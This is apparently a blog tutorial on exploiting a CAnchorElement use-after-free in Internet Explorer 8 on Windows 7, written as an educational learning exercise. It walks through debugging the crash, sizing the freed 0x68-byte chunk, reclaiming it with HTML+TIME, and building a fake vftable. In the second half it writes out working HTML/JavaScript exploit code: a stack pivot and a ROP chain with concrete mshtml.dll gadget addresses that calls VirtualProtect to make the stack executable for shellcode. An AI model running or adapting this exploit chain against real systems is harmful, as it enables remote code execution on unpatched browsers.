Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vulnexe, and vulnexe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!


This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx] 	 ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]	 ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx 			 ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
          vftable+= unescape("\u4141\u4141");

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon seperated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
        vftable += ";vftable";

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
        fillAlloc += "\u4242\u4242";

      // Create an array and add it as an element
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      catch (e) {};

            <q id='a'>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
  vftable+= unescape("\u4141\u4141");

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
else if (i == 0x68/4-1)
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit

// ROP chain
rop = "\u9090\u9090"; 					  // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
rop += "\u9090\u9090";

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\u9191\u9191"

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

